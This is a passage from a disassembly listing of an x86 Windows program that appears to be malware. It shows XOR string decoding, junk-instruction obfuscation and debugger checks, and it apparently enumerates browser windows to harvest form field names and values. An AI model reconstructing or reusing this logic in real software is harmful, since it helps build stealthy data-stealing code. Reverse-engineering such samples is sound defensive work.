arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 3E0h
push ebx
push esi
push edi
lea edi, [ebp+var_27D]
lea esi, aIJ ; "%i J"
mov ecx, 5
rep movsb
and [ebp+var_14C], 0
mov eax, dword_442319
mov [ebp+var_281], eax
xor ebx, ebx
lea edi, [ebp+var_286]
lea esi, aS?xv ; "S?XV"
mov ecx, 5
rep movsb
push offset dword_4422A4
call sub_40C830 ; InterlockedIncrement
mov [ebp+var_26C], eax
mov [ebp+var_264], 6A69h
mov eax, [ebp+var_264]
mov edx, eax
add edx, eax
mov [ebp+var_264], edx
push 10h
push 0
lea eax, [ebp+var_260]
push eax
call sub_40CC20
mov [ebp+var_266], 6967h
sub [ebp+var_266], 112Ch
mov [ebp+var_270], 104h
call sub_40C794 ; GetProcessHeap
push 21h
push offset byte_446FD3
call sub_405138
mov [ebp+var_2B4], eax
push 4
push offset aLHt ; "l]HT"
call sub_405138
lea edi, [ebp+var_28C]
push edi
lea edi, [ebp+var_270]
push edi
lea edi, [ebp+var_250]
push edi
push eax
mov edi, [ebp+var_2B4]
push edi
push 80000002h
call sub_4014C9
add esp, 34h
mov [ebp+var_274], eax
mov [ebp+var_268], 31E9h
sub [ebp+var_268], 5E5h
test eax, eax
jnz short loc_40632D
mov [ebp+var_2B5], 0E2h
add [ebp+var_2B5], 1
push [ebp+arg_0]
call sub_40C884 ; LocalFree
lea edi, [ebp+var_2BB]
lea esi, aDFY ; "D/f'Y"
mov ecx, 3
rep movsw
xor eax, eax
jmp loc_406810
; ---------------------------------------------------------------------------
loc_40632D: ; CODE XREF: sub_4061F7+103�j
call sub_405E88
lea edi, [ebp+var_28F]
lea esi, a6l ; "6l"
mov ecx, 3
rep movsb
push 104h
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_250]
push eax
call sub_40C71C ; ExpandEnvironmentStringsA
lea edi, [ebp+var_295]
lea esi, byte_44232B
mov ecx, 3
rep movsw
push [ebp+var_26C]
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
lea eax, [ebp+var_250]
push eax
call sub_4054C8
add esp, 20h
mov [ebp+var_14C], eax
cmp [ebp+arg_1C], 0
jz short loc_4063BC
cmp eax, 0FFFFFFFFh
jz short loc_4063B6
mov eax, [ebp+arg_1C]
mov edx, [ebp+var_14C]
mov [eax], edx
jmp short loc_4063BC
; ---------------------------------------------------------------------------
loc_4063B6: ; CODE XREF: sub_4061F7+1B0�j
mov eax, [ebp+arg_1C]
and dword ptr [eax], 0
loc_4063BC: ; CODE XREF: sub_4061F7+1AB�j
; sub_4061F7+1BD�j
cmp [ebp+var_14C], 0
jnz short loc_4063DF
mov eax, dword_442331
mov [ebp-2B8h], eax
push [ebp+arg_0]
call sub_40C884 ; LocalFree
xor eax, eax
jmp loc_406810
; ---------------------------------------------------------------------------
loc_4063DF: ; CODE XREF: sub_4061F7+1CC�j
push 0Eh
push offset byte_446FBF
call sub_405138
push eax
lea edi, [ebp+var_104]
push edi
call sub_40CC74
lea edi, [ebp+var_298]
lea esi, byte_442335
mov ecx, 3
rep movsb
lea eax, [ebp+var_250]
push eax
lea eax, [ebp+var_104]
push eax
call sub_40CC74
call sub_40C794 ; GetProcessHeap
call sub_4043CA
mov [ebp+var_278], eax
lea edi, [ebp+var_29F]
lea esi, aEnoX ; "Eno$#X"
mov ecx, 7
rep movsb
push 44h
push 0
lea eax, [ebp+var_148]
push eax
call sub_40CC20
call sub_40C854 ; IsDebuggerPresent
push 44h
push 0
lea eax, [ebp+var_148]
push eax
call sub_40CC20
add esp, 30h
lea edi, [ebp+var_2A5]
lea esi, a231w ; "231w-"
mov ecx, 3
rep movsw
mov [ebp+var_148], 44h
lea edi, [ebp+var_2AD]
lea esi, aR2Oe@ ; "r2#Oe%@"
mov ecx, 2
rep movsd
mov [ebp+var_11C], 1
mov [ebp+var_118], 1
cmp [ebp+var_278], 0
jz short loc_4064C5
lea eax, [ebp+var_148]
push eax
call sub_40446E
pop ecx
jmp short loc_4064CE
; ---------------------------------------------------------------------------
loc_4064C5: ; CODE XREF: sub_4061F7+2BD�j
mov [ebp+var_118], 0
loc_4064CE: ; CODE XREF: sub_4061F7+2CC�j
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_148]
push eax
push 0
push 0
push 20h
push 0
push 0
push 0
lea eax, [ebp+var_104]
push eax
push 0
call sub_40C974 ; CreateProcessA
or eax, eax
jz loc_4067AD
mov eax, dword_44234D
mov [ebp+var_2C4], eax
push [ebp+var_25C]
call sub_40C7AC ; CloseHandle
mov dword ptr [ebp-2BCh], 4906h
mov eax, 28BCh
mul dword ptr [ebp-2BCh]
mov [ebp+var_2C8], eax
mov [ebp-2BCh], eax
push 22h
push offset dword_446F9C
call sub_405138
push [ebp+var_26C]
push offset aMicrosoftCorp ; "MicroSoft-Corp"
push eax
lea edi, [ebp+var_104]
push edi
call sub_40CC50
add esp, 18h
mov [ebp+var_2C0], 5F7Dh
add [ebp+var_2C0], 58F3h
mov [ebp+var_2B5], 0
jmp short loc_4065D0
; ---------------------------------------------------------------------------
loc_406579: ; CODE XREF: sub_4061F7+3E1�j
call sub_40C7C4 ; GetTickCount
push 7
push offset aUyznQy ; "uyzN]QY"
call sub_405138
add esp, 8
lea edi, [ebp+var_104]
push edi
push eax
call sub_40C9B0 ; FindWindowA
mov ebx, eax
or ebx, ebx
jnz short loc_4065DA
mov [ebp+var_2C9], 0BAh
add [ebp+var_2C9], 0Bh
mov eax, dword_44229C
add eax, 3D7h
push eax
call sub_40C8F0 ; Sleep
mov eax, dword_442351
mov [ebp+var_2CD], eax
add [ebp+var_2B5], 1
loc_4065D0: ; CODE XREF: sub_4061F7+380�j
mov al, [ebp+var_2B5]
cmp al, 0Ah
jb short loc_406579
loc_4065DA: ; CODE XREF: sub_4061F7+3A7�j
or ebx, ebx
jz loc_40679F
call sub_40C734 ; GetCurrentProcessId
push 0EA60h
call sub_40C8F0 ; Sleep
call sub_40C764 ; RtlGetLastWin32Error
push 104h
lea eax, [ebp+var_104]
push eax
push ebx
call sub_40C998 ; GetWindowTextA
call sub_40C794 ; GetProcessHeap
mov eax, 12h
sub eax, dword_44229C
push eax
push offset aXOkrecv11 ; "X-okRecv11"
lea eax, [ebp+var_104]
push eax
call sub_40181A
add esp, 0Ch
cmp eax, 0FFFFh
jz loc_406775
lea edi, [ebp+var_2D2]
lea esi, aCurh ; "`CuRH"
mov ecx, 3
rep movsw
mov [ebp+var_2CD+1], 4072h
inc [ebp+var_2CD+1]
lea eax, [ebp+var_3D6]
push eax
push [ebp+arg_4]
call sub_40523D
add esp, 8
or eax, eax
jz loc_406759
call sub_40C740 ; GetCurrentThreadId
push 0
push [ebp+arg_8]
lea eax, [ebp+var_3D6]
push eax
call sub_40C86C ; CopyFileA
lea edi, [ebp+var_3DF]
lea esi, aC ; "c "
mov ecx, 3
rep movsb
lea eax, [ebp+var_14C]
push eax
push [ebp+arg_8]
call sub_401A7E
mov [ebp+var_3DC], eax
call sub_40C734 ; GetCurrentProcessId
push [ebp+arg_8]
call sub_40C704 ; DeleteFileA
mov [ebp+var_3D7], 18h
movzx eax, [ebp+var_3D7]
imul eax, 415h
mov [ebp+var_3D7], al
push offset aHtml ; "<HTML><!--"
call sub_40C95C ; lstrlenA
push eax
push offset aHtml ; "<HTML><!--"
push [ebp+var_3DC]
call sub_40CC8C
add esp, 14h
or eax, eax
jnz short loc_406727
push offset aHtml ; "<HTML><!--"
call sub_40C95C ; lstrlenA
mov edi, [ebp+var_14C]
sub edi, 3Ah
push edi
mov edi, eax
add edi, [ebp+var_3DC]
push edi
push [ebp+arg_8]
call sub_4051C3
add esp, 0Ch
jmp short loc_406742
; ---------------------------------------------------------------------------
loc_406727: ; CODE XREF: sub_4061F7+504�j
mov eax, [ebp+var_14C]
sub eax, 40h
push eax
push [ebp+var_3DC]
push [ebp+arg_8]
call sub_4051C3
add esp, 0Ch
loc_406742: ; CODE XREF: sub_4061F7+52E�j
push [ebp+var_3DC]
call sub_40C884 ; LocalFree
mov [ebp+var_14C], 2
jmp short loc_4067CE
; ---------------------------------------------------------------------------
loc_406759: ; CODE XREF: sub_4061F7+479�j
mov [ebp+var_3DC], 14F0h
inc [ebp+var_3DC]
mov [ebp+var_14C], 1
jmp short loc_4067CE
; ---------------------------------------------------------------------------
loc_406775: ; CODE XREF: sub_4061F7+43B�j
mov [ebp+var_2CD+1], 789Bh
mov eax, 506Fh
mul [ebp+var_2CD+1]
mov [ebp-2D0h], eax
mov [ebp+var_2CD+1], eax
and [ebp+var_14C], 0
jmp short loc_4067CE
; ---------------------------------------------------------------------------
loc_40679F: ; CODE XREF: sub_4061F7+3E5�j
call sub_40C740 ; GetCurrentThreadId
and [ebp+var_14C], 0
jmp short loc_4067CE
; ---------------------------------------------------------------------------
loc_4067AD: ; CODE XREF: sub_4061F7+301�j
mov dword ptr [ebp-2B8h], 1965h
mov eax, [ebp-2B8h]
mov edx, eax
add edx, eax
mov [ebp-2B8h], edx
and [ebp+var_14C], 0
loc_4067CE: ; CODE XREF: sub_4061F7+560�j
; sub_4061F7+57C�j ...
lea eax, [ebp+var_250]
push eax
call sub_40C704 ; DeleteFileA
call sub_40C854 ; IsDebuggerPresent
push [ebp+arg_0]
call sub_40C884 ; LocalFree
call sub_40C764 ; RtlGetLastWin32Error
push 0
push [ebp+var_260]
call sub_40C8FC ; TerminateProcess
mov ebx, 77CCh
inc ebx
push [ebp+var_260]
call sub_40C7AC ; CloseHandle
mov eax, [ebp+var_14C]
loc_406810: ; CODE XREF: sub_4061F7+131�j
; sub_4061F7+1E3�j
pop edi
pop esi
pop ebx
leave
retn
sub_4061F7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406815 proc near ; CODE XREF: sub_406A40+AD�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
mov esi, [ebp+arg_4]
mov [ebp+var_4], 307h
push esi
push [ebp+arg_0]
mov eax, dword_442368
lea eax, ds:41C7C0h[eax]
push eax
call sub_40CC14
add esp, 0Ch
mov [ebp+var_8], 12Ah
xor edi, edi
jmp short loc_406862
; ---------------------------------------------------------------------------
loc_40684B: ; CODE XREF: sub_406815+4F�j
mov eax, dword_442368
add eax, edi
lea eax, ds:41C7C0h[eax]
movsx edx, byte ptr [eax]
xor edx, 16h
mov [eax], dl
inc edi
loc_406862: ; CODE XREF: sub_406815+34�j
cmp edi, esi
jl short loc_40684B
mov [ebp+var_C], 3B6h
mov eax, dword_442368
add eax, esi
mov byte ptr ds:dword_41C7C0[eax], 0
mov edi, dword_442368
inc dword_442368
mov eax, dword_442368
lea eax, [eax+esi+2]
mov dword_442368, eax
add dword_442368, 2
cmp dword_442368, 0DD4h
jle short loc_4068B0
and dword_442368, 0
loc_4068B0: ; CODE XREF: sub_406815+92�j
mov [ebp+var_10], 1F1h
lea eax, dword_41C7C0[edi]
pop edi
pop esi
leave
retn
sub_406815 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4068C1 proc near ; CODE XREF: sub_406D2E+141�p
; sub_406D2E+562�p ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
mov esi, [ebp+arg_4]
mov [ebp+var_1], 73h
movzx eax, [ebp+var_1]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_1], al
push ebx
call sub_40C968 ; lstrlenW
mov edi, eax
call sub_40C794 ; GetProcessHeap
push 0
push 0
push 1FFFh
push esi
push edi
push ebx
push 0
push 0
call sub_40C92C ; WideCharToMultiByte
call sub_40C764 ; RtlGetLastWin32Error
mov byte ptr [esi+edi], 0
mov eax, edi
pop edi
pop esi
pop ebx
leave
retn
sub_4068C1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406911 proc near ; CODE XREF: sub_40696D+C1�p
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
call sub_40C7D0 ; GetVersion
cmp dword_442370, 0
jz short loc_406933
mov eax, dword_442370
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_406933: ; CODE XREF: sub_406911+15�j
lea edi, [ebp+var_8]
lea esi, aWrIo ; " -wR`iO"
movsd
movsd
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
mov ebx, 1BD8h
inc ebx
mov eax, [ebp+arg_0]
mov eax, [eax]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
mov eax, dword_442380
mov [ebp+var_C], eax
call sub_40BC74
pop edi
pop esi
pop ebx
leave
retn
sub_406911 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40696D proc near ; CODE XREF: sub_406D2E+54�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_16 = byte ptr -16h
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2Ch
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
call sub_40C794 ; GetProcessHeap
mov [ebp+var_6], 366h
sub [ebp+var_6], 7E1Dh
and dword ptr [ebx], 0
and dword ptr [ebx+4], 0
push 0
call sub_40BC68
call sub_40C740 ; GetCurrentThreadId
lea eax, [ebp+var_16]
push eax
push offset a9ba05972F6a811 ; "{9BA05972-F6A8-11CF-A442-00A0C90A8F39}"
call sub_40BC5C
mov [ebp+var_4], eax
xor eax, eax
cmp [ebp+var_4], 0
setl al
mov [ebp+var_24], eax
test eax, eax
jnz short loc_406A2D
push ebx
push offset dword_447B1C
push 4
push 0
lea eax, [ebp+var_16]
push eax
call sub_40BC50
mov [ebp+var_4], eax
lea edi, [ebp+var_1C]
lea esi, aCsbS ; "cSB>s"
mov ecx, 3
rep movsw
xor eax, eax
cmp [ebp+var_4], 0
setl al
mov [ebp+var_28], eax
test eax, eax
jnz short loc_406A2D
mov eax, dword_44238A
mov [ebp+var_20], eax
mov eax, ebx
add eax, 4
push eax
push offset dword_447B0C
mov eax, [ebx]
push dword ptr [ebx]
mov edi, [eax]
call dword ptr ds:0[edi]
mov [ebp+var_4], eax
xor eax, eax
cmp [ebp+var_4], 0
setl al
mov [ebp+var_2C], eax
test eax, eax
jnz short loc_406A2D
xor eax, eax
inc eax
jmp short loc_406A3B
; ---------------------------------------------------------------------------
loc_406A2D: ; CODE XREF: sub_40696D+4F�j
; sub_40696D+86�j ...
push ebx
call sub_406911
pop ecx
call sub_40C794 ; GetProcessHeap
xor eax, eax
loc_406A3B: ; CODE XREF: sub_40696D+BE�j
pop edi
pop esi
pop ebx
leave
retn
sub_40696D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406A40 proc near ; CODE XREF: sub_406D2E+86�p
var_1004A = byte ptr -1004Ah
var_10044 = word ptr -10044h
var_10042 = byte ptr -10042h
var_1003C = byte ptr -1003Ch
var_10034 = dword ptr -10034h
var_1002F = byte ptr -1002Fh
var_30 = dword ptr -30h
var_29 = byte ptr -29h
var_28 = word ptr -28h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1004Ch
call sub_40C6B8
push ebx
push esi
push edi
mov [ebp+var_E], 0ADBh
sub [ebp+var_E], 2E5Bh
cmp dword_442374, 0FFFFh
jz short loc_406A6F
and dword_44236C, 0
loc_406A6F: ; CODE XREF: sub_406A40+26�j
call sub_40C734 ; GetCurrentProcessId
mov eax, dword_44236C
cmp [ebp+arg_4], eax
jz loc_406C9D
call sub_40C734 ; GetCurrentProcessId
mov eax, [ebp+arg_4]
mov dword_44236C, eax
cmp dword_442370, 0
jz short loc_406ABF
call sub_40C734 ; GetCurrentProcessId
mov eax, dword_442370
push eax
mov esi, [eax]
call dword ptr [esi+8]
mov [ebp+var_10044], 0D6h
inc [ebp+var_10044]
and dword_442370, 0
loc_406ABF: ; CODE XREF: sub_406A40+56�j
lea edi, [ebp+var_1003C]
lea esi, word_44238E
movsd
movsd
push 0FFFFh
lea eax, [ebp+var_1002F]
push eax
push [ebp+arg_4]
call sub_40C998 ; GetWindowTextA
call sub_40C794 ; GetProcessHeap
push 1Bh
push offset unk_446F14
call sub_406815
mov edi, 0Eh
sub edi, dword_442364
push edi
push eax
lea edi, [ebp+var_1002F]
push edi
call sub_40181A
add esp, 14h
cmp eax, 0FFFFh
jnz short loc_406B45
lea edi, [ebp+var_1004A]
lea esi, word_442396
mov ecx, 3
rep movsw
and dword_442370, 0
mov [ebp+var_10044], 1FF4h
inc [ebp+var_10044]
jmp loc_406C9D
; ---------------------------------------------------------------------------
loc_406B45: ; CODE XREF: sub_406A40+D3�j
lea eax, [ebp+var_C]
push eax
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push eax
mov edi, [eax]
call dword ptr [edi+1Ch]
mov ebx, eax
cmp [ebp+var_C], 0
jz loc_406C9D
call sub_40C764 ; RtlGetLastWin32Error
or ebx, ebx
jnz loc_406C9D
call sub_40C740 ; GetCurrentThreadId
and [ebp+var_4], 0
cmp dword_442374, 0FFFFh
jz short loc_406BA8
call sub_40C854 ; IsDebuggerPresent
inc dword_442374
mov eax, [ebp+var_C]
cmp dword_442374, eax
jbe short loc_406BA0
and dword_442374, 0
loc_406BA0: ; CODE XREF: sub_406A40+157�j
mov eax, dword_442374
mov [ebp+var_4], eax
loc_406BA8: ; CODE XREF: sub_406A40+141�j
; sub_406A40+250�j
push 0
call sub_40CBD8
pop ecx
mov [ebp+var_28], 2
mov eax, [ebp+var_4]
mov [ebp+var_20], eax
mov dword_442374, eax
lea eax, [ebp+var_14]
push eax
lea esi, [ebp+var_28]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+arg_0]
mov edi, [edi+4]
push edi
mov edi, [edi]
call dword ptr [edi+20h]
mov ebx, eax
mov [ebp+var_8], 0E5h
mov eax, [ebp+var_8]
mov edx, eax
add edx, eax
mov [ebp+var_8], edx
or ebx, ebx
jnz short loc_406C65
push offset dword_442370
push offset dword_447B2C
mov eax, [ebp+var_14]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
lea edi, [ebp+var_10042]
lea esi, dword_44239C
mov ecx, 3
rep movsw
or ebx, ebx
jnz short loc_406C65
mov [ebp+var_29], 22h
sub [ebp+var_29], 83h
lea eax, [ebp+var_10034]
push eax
mov eax, dword_442370
push eax
mov edi, [eax]
call dword ptr [edi+94h]
mov ebx, eax
call sub_40C740 ; GetCurrentThreadId
or ebx, ebx
jnz short loc_406C65
mov dword_442374, 0FFFFh
mov eax, [ebp+arg_4]
cmp [ebp+var_10034], eax
jz short loc_406C9D
loc_406C65: ; CODE XREF: sub_406A40+1B5�j
; sub_406A40+1E6�j ...
cmp dword_442370, 0
jz short loc_406C79
mov eax, dword_442370
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_406C79: ; CODE XREF: sub_406A40+22C�j
mov [ebp+var_30], 48A1h
add [ebp+var_30], 7310h
inc [ebp+var_4]
mov eax, [ebp+var_C]
cmp [ebp+var_4], eax
jb loc_406BA8
and dword_442370, 0
loc_406C9D: ; CODE XREF: sub_406A40+3C�j
; sub_406A40+100�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_406A40 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406CA2 proc near ; CODE XREF: sub_406D2E+5E1�p
; sub_406D2E+62A�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
mov eax, dword_4423AC
lea eax, ds:431C50h[eax]
push eax
call sub_40CC14
add esp, 0Ch
mov [ebp+var_4], 0D2h
xor edi, edi
jmp short loc_406CE9
; ---------------------------------------------------------------------------
loc_406CCF: ; CODE XREF: sub_406CA2+49�j
mov eax, dword_4423AC
add eax, edi
lea eax, ds:431C50h[eax]
movsx edx, byte ptr [eax]
xor edx, 0FDh
mov [eax], dl
inc edi
loc_406CE9: ; CODE XREF: sub_406CA2+2B�j
cmp edi, esi
jl short loc_406CCF
mov eax, dword_4423AC
add eax, esi
mov byte ptr ds:dword_431C50[eax], 0
mov edi, dword_4423AC
add dword_4423AC, 3
mov eax, dword_4423AC
inc eax
add eax, esi
mov dword_4423AC, eax
cmp eax, 0DC5h
jle short loc_406D24
and dword_4423AC, 0
loc_406D24: ; CODE XREF: sub_406CA2+79�j
lea eax, dword_431C50[edi]
pop edi
pop esi
leave
retn
sub_406CA2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406D2E proc near ; CODE XREF: sub_407E49+69�p
var_6381D = byte ptr -6381Dh
var_6381C = byte ptr -6381Ch
var_63816 = word ptr -63816h
var_63814 = dword ptr -63814h
var_6380F = byte ptr -6380Fh
var_62810 = dword ptr -62810h
var_6280C = dword ptr -6280Ch
var_62808 = word ptr -62808h
var_62806 = word ptr -62806h
var_62804 = dword ptr -62804h
var_62800 = word ptr -62800h
var_627F8 = dword ptr -627F8h
var_627F0 = word ptr -627F0h
var_627E8 = dword ptr -627E8h
var_627E0 = dword ptr -627E0h
var_627DC = dword ptr -627DCh
var_627D8 = dword ptr -627D8h
var_627D4 = byte ptr -627D4h
var_627D3 = byte ptr -627D3h
var_627CC = word ptr -627CCh
var_627CA = byte ptr -627CAh
var_627C4 = byte ptr -627C4h
var_627BF = byte ptr -627BFh
var_627BC = word ptr -627BCh
var_627BA = byte ptr -627BAh
var_627B9 = byte ptr -627B9h
var_627B8 = dword ptr -627B8h
var_627B3 = byte ptr -627B3h
var_626B4 = dword ptr -626B4h
var_626B0 = dword ptr -626B0h
var_626AC = dword ptr -626ACh
var_626A8 = word ptr -626A8h
var_626A0 = dword ptr -626A0h
var_62694 = dword ptr -62694h
var_62690 = dword ptr -62690h
var_6268C = dword ptr -6268Ch
var_62688 = dword ptr -62688h
var_62684 = dword ptr -62684h
var_62680 = dword ptr -62680h
var_6267C = dword ptr -6267Ch
var_62677 = byte ptr -62677h
var_62674 = dword ptr -62674h
var_6266D = byte ptr -6266Dh
var_5269E = byte ptr -5269Eh
var_5269A = word ptr -5269Ah
var_52698 = dword ptr -52698h
var_52694 = dword ptr -52694h
var_52690 = byte ptr -52690h
var_52688 = dword ptr -52688h
var_52680 = word ptr -52680h
var_52678 = dword ptr -52678h
var_52674 = dword ptr -52674h
var_5266F = byte ptr -5266Fh
var_5266E = byte ptr -5266Eh
var_5266D = byte ptr -5266Dh
var_52667 = dword ptr -52667h
var_52663 = byte ptr -52663h
var_5265D = byte ptr -5265Dh
var_52657 = byte ptr -52657h
var_52656 = byte ptr -52656h
var_52653 = byte ptr -52653h
var_5264E = dword ptr -5264Eh
var_52649 = byte ptr -52649h
var_52644 = dword ptr -52644h
var_52640 = dword ptr -52640h
var_5263C = dword ptr -5263Ch
var_52638 = byte ptr -52638h
var_5262D = byte ptr -5262Dh
var_5262C = dword ptr -5262Ch
var_52626 = word ptr -52626h
var_52624 = word ptr -52624h
var_52622 = word ptr -52622h
var_5261F = byte ptr -5261Fh
var_5261E = byte ptr -5261Eh
var_5261D = byte ptr -5261Dh
var_5261C = dword ptr -5261Ch
var_52618 = dword ptr -52618h
var_52614 = dword ptr -52614h
var_52610 = dword ptr -52610h
var_52609 = byte ptr -52609h
var_52608 = dword ptr -52608h
var_52604 = dword ptr -52604h
var_525FE = word ptr -525FEh
var_525FC = dword ptr -525FCh
var_525F6 = word ptr -525F6h
var_525F4 = dword ptr -525F4h
var_525EE = word ptr -525EEh
var_525EC = dword ptr -525ECh
var_525E8 = dword ptr -525E8h
var_525E4 = dword ptr -525E4h
var_525DF = byte ptr -525DFh
var_524E0 = byte ptr -524E0h
var_524D8 = dword ptr -524D8h
var_524CC = dword ptr -524CCh
var_524C8 = byte ptr -524C8h
var_39E28 = byte ptr -39E28h
var_21788 = word ptr -21788h
var_21786 = word ptr -21786h
var_21784 = dword ptr -21784h
var_2177D = byte ptr -2177Dh
var_1177E = word ptr -1177Eh
var_1177C = word ptr -1177Ch
var_10FAC = dword ptr -10FACh
var_10FA8 = dword ptr -10FA8h
var_10FA4 = dword ptr -10FA4h
var_10001 = byte ptr -10001h
var_2 = word ptr -2
push ebp
mov ebp, esp
mov eax, 63820h
call sub_40C6B8
push ebx
push esi
push edi
mov [ebp+var_525F6], 7310h
movzx eax, [ebp+var_525F6]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_525F6], ax
push offset aValue ; "value"
call sub_40BC2C
mov [ebp+var_10FA8], eax
push offset aName ; "name"
call sub_40BC2C
mov [ebp+var_10FAC], eax
lea eax, [ebp+var_52638]
push eax
call sub_40696D
pop ecx
or eax, eax
jz loc_407E44
call sub_40C764 ; RtlGetLastWin32Error
loc_406D95: ; CODE XREF: sub_406D2E+9A�j
; sub_406D2E+CB�j ...
push 0
call sub_40CBD8
call sub_40C854 ; IsDebuggerPresent
call sub_40C9E0 ; GetForegroundWindow
mov [ebp+var_52614], eax
push eax
lea eax, [ebp+var_52638]
push eax
call sub_406A40
add esp, 0Ch
call sub_40C7C4 ; GetTickCount
cmp dword_442370, 0
jz short loc_406D95
mov [ebp+var_52618], 4FCAh
sub [ebp+var_52618], 3B66h
lea eax, [ebp+var_525F4]
push eax
mov eax, dword_442370
push eax
mov edi, [eax]
call dword ptr [edi+48h]
mov ebx, eax
call sub_40C854 ; IsDebuggerPresent
or ebx, ebx
jnz short loc_406D95
lea eax, [ebp+var_525FC]
push eax
push offset dword_447ACC
mov eax, [ebp+var_525F4]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov [ebp+var_5261C], 7776h
add [ebp+var_5261C], 6412h
or ebx, ebx
jnz loc_407E25
call sub_40C734 ; GetCurrentProcessId
lea eax, [ebp+var_5263C]
push eax
mov eax, dword_442370
push eax
mov edi, [eax]
call dword ptr [edi+78h]
mov ebx, eax
mov [ebp+var_5261D], 4
add [ebp+var_5261D], 1
or ebx, ebx
jnz loc_407E02
push offset byte_41FB10
push [ebp+var_5263C]
call sub_4068C1
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_52644], edi
mov eax, [ebp+var_52614]
mov ds:dword_42FB14, eax
lea eax, [ebp+var_525FE]
push eax
mov eax, dword_442370
push eax
mov edi, [eax]
call dword ptr [edi+7Ch]
mov ebx, eax
mov [ebp+var_5261E], 74h
add [ebp+var_5261E], 1
or ebx, ebx
jnz loc_407E02
cmp [ebp+var_525FE], 0
jnz loc_407E02
lea edi, [ebp+var_52649]
lea esi, aObw8 ; "oW8"
mov ecx, 5
rep movsb
mov eax, dword_4423BB
mov [ebp+var_5264E+1], eax
mov [ebp+var_10001], 0
mov [ebp+var_2], 0
lea eax, [ebp+var_52604]
push eax
mov eax, [ebp+var_525FC]
push eax
mov edi, [eax]
call dword ptr [edi+5Ch]
mov ebx, eax
mov [ebp+var_5261F], 10h
movzx eax, [ebp+var_5261F]
imul eax, 7B1Bh
mov [ebp+var_5261F], al
or ebx, ebx
jnz loc_407E02
lea edi, [ebp+var_52653]
lea esi, aQungz ; "QUnZ"
mov ecx, 3
rep movsw
lea eax, [ebp+var_52640]
push eax
mov eax, [ebp+var_52604]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
call sub_40C7C4 ; GetTickCount
or ebx, ebx
jnz loc_407DED
call sub_40C854 ; IsDebuggerPresent
or [ebp+var_524CC], 0FFFFFFFFh
loc_406F67: ; CODE XREF: sub_406D2E+B83�j
mov [ebp+var_52622], 1C5h
add [ebp+var_52622], 47D9h
and [ebp+var_52608], 0
and [ebp+var_52610], 0
cmp [ebp+var_524CC], 0FFFFFFFFh
jnz short loc_406FD3
call sub_40C764 ; RtlGetLastWin32Error
lea eax, [ebp+var_525E4]
push eax
mov eax, [ebp+var_525FC]
push eax
mov edi, [eax]
call dword ptr [edi+38h]
mov ebx, eax
lea edi, [ebp+var_52678+1]
lea esi, aKxafL ; "KxAf+/L"
movsd
movsd
or ebx, ebx
jnz loc_40789F
mov [ebp+var_5266F], 40h
add [ebp+var_5266F], 3Ch
jmp loc_407112
; ---------------------------------------------------------------------------
loc_406FD3: ; CODE XREF: sub_406D2E+260�j
call sub_40C734 ; GetCurrentProcessId
mov [ebp+var_52680], 17h
mov eax, [ebp+var_524CC]
mov [ebp+var_52678], eax
lea eax, [ebp+var_52690]
push eax
lea eax, [ebp+var_52680]
push eax
mov eax, [ebp+var_52604]
push eax
mov esi, [eax]
call dword ptr [esi+1Ch]
call sub_40C7D0 ; GetVersion
lea eax, [ebp+var_52608]
push eax
push offset dword_447AFC
mov eax, [ebp+var_52688]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, dword_4423CD
mov [ebp+var_52694], eax
or ebx, ebx
jnz loc_40789F
mov [ebp+var_5266F], 2Eh
movzx eax, [ebp+var_5266F]
imul eax, 392Ch
mov [ebp+var_5266F], al
lea eax, [ebp+var_52610]
push eax
